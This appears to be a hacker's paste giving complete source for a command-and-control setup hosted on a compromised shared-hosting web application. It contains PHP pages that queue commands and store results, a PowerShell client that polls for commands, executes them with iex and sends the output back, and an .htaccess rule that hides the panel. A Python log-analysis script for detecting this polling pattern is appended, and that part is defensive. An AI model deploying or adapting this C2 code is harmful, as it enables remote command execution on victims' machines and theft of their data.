Vegeta_Ssj

C&C Server On Compromised Webapplication | Shared Hosting

Jul 13th, 2020 (edited)
 ________________________________________
/ Vegeta_Ssj : Command to Control Server \
\ On Compromised Webapplication          /
 ----------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

email: vegeta_ssj@riseup.net
jid: vegeta@exploit.im / vegeta_ssj@4cjw6cwpeaeppfqz.onion
https://saiyajinz.sytes.net

https://i.postimg.cc/XYgzjC5c/1.png

Attacker/Compromised WebApp:

[windrcmm@server163 c2]$ ls
command.txt  index.php  json.php  json.txt  output.txt  post.php

index.php | Simple page that sends a POST request with the command and displays the output from the infected host.

<!DOCTYPE html>
<head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><title>c&c</title>
<meta http-equiv="refresh" content="10" />
</head>
<body>
<center>
<form name="yolo" id="banjolo" action="http://localhost/c2/post.php" method="post">
<p>
<b>Enter Command:</b><br>
<input type="text" name="lolo" id="banjolo" class="input" value="" size="112" autocapitalize="off" />
</p></form>
<div><object width="700" height="700" data="/c2/json.txt"></object></div>
</center>
</body>
</html>

post.php | The PHP script that receives the POST request with the command and saves it to the text file:

<?php
header ('Location: http://localhost/c2');
$handle = fopen("/home/windrcmm/www/c2/command.txt", "w");
foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fclose($handle);
exit;
?>

json.php | A PHP script that receives data in JSON format sent from an infected station and saves it to a text file.

<?php
$jsonString = file_get_contents("php://input");
$myFile = "json.txt";
file_put_contents($myFile,$jsonString);
?>

Target / PowerShell Client:

#CremeDeLaCreme c&c client

while($true)
{
$res=Invoke-WebRequest “http://localhost/c2/command.txt”
$www = $res.ParsedHtml.body.innerText;$request = $www -replace ‘command=
$execute = $request | iex | Out-String
$param = @{
    Uri         = "https://localhost/c2/json.php"
    Method      = "Post"
    Body        = $execute
    ContentType = "application/json"
}
Invoke-RestMethod @param
}

.htaccess | I secure the path to my C2 by allowing only my own and my target's IP addresses. You can add a second layer with basic authentication.

RewriteEngine on
RewriteCond %{REMOTE_ADDR} !185.10.68.218$
RewriteCond %{REMOTE_ADDR} !98.98.98.98$
RewriteRule ^/?c2 - [F]
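
In the hosting site's access log, the client loop above shows up as one address repeatedly fetching a .txt file and then POSTing to a .php script in the same directory. The detection check below is an added example, not part of the original paste; it assumes Apache combined log format, and the function names, sample log lines and IP addresses are constructed.

```python
import re
from collections import defaultdict
from posixpath import dirname

# Apache "combined" access-log format (assumed).
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
                  r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def find_poll_then_post(lines, min_cycles=3):
    """Flag (IP, directory) pairs that repeatedly GET a .txt then POST to a .php beside it."""
    pending = set()                 # pairs with a .txt GET not yet followed by a POST
    cycles, agents = defaultdict(int), defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                # skip lines that are not in combined format
        path = m["path"].split("?", 1)[0]
        key = (m["ip"], dirname(path))
        if m["method"] == "GET" and path.endswith(".txt"):
            pending.add(key)
        elif m["method"] == "POST" and path.endswith(".php") and key in pending:
            pending.discard(key)
            cycles[key] += 1
            agents[key].add(m["ua"])
    # The User-Agent is client-controlled, so treat it as corroboration only.
    return {key: {"cycles": n,
                  "powershell_ua": any("powershell" in ua.lower() for ua in agents[key])}
            for key, n in cycles.items() if n >= min_cycles}

PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"

def _hit(ip, clock, method, path, ua):
    return f'{ip} - - [13/Jul/2020:{clock} +0000] "{method} {path} HTTP/1.1" 200 64 "-" "{ua}"'

# Constructed sample log (documentation IP ranges); not taken from the page.
SAMPLE_LOG = [
    _hit("203.0.113.7", "10:00:01", "GET", "/c2/command.txt", PS_UA),
    _hit("203.0.113.7", "10:00:02", "POST", "/c2/json.php", PS_UA),
    _hit("198.51.100.9", "10:00:03", "GET", "/robots.txt", BROWSER_UA),
    _hit("198.51.100.9", "10:00:04", "POST", "/login.php", BROWSER_UA),
    _hit("203.0.113.7", "10:00:05", "GET", "/c2/command.txt", PS_UA),
    _hit("203.0.113.7", "10:00:06", "POST", "/c2/json.php", PS_UA),
    _hit("203.0.113.7", "10:00:08", "GET", "/c2/command.txt", PS_UA),
    _hit("203.0.113.7", "10:00:09", "POST", "/c2/json.php", PS_UA),
]

if __name__ == "__main__":
    print(find_poll_then_post(SAMPLE_LOG))
```

The single GET/POST pair from the browser client stays below `min_cycles`, which is what keeps ordinary form traffic out of the result.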